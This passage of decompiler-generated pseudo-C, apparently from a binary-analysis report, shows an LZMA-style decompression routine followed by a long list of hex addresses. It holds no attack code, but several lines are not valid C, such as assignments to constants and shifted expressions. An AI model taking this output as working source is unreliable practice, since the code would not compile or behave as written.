										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004068da
0x004068da
0x004068df
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00406f97
0x00406f97
0x00406f9b
0x0040714a
0x00000000
0x0040714a
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00000000
0x00406fb9
0x004068e1
0x004068e1
0x004068e5
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406906
0x0040690d
0x00406910
0x0040691b
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x0040692a
0x00406948
0x0040694a
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b6f
0x00406b72
0x00406b15
0x00406b1b
0x00000000
0x00000000
0x00000000
0x00406b74
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b12
0x00000000
0x00406b12
0x0040692c
0x0040692c
0x0040692f
0x00406935
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a1e
0x00406a21
0x00406998
0x00406998
0x0040699e
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aab
0x00406aae
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a4e
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00406ac3
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00406c85
0x00406c85
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x004069aa
0x00000000
0x00000000
0x00000000
0x00406a27
0x00406973
0x00406977
0x004070e4
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406995
0x00000000
0x00406995
0x00406a21
0x0040692a
0x0040675e
0x0040675e
0x00406767
0x00407175
0x00407175
0x00000000
0x00407175
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
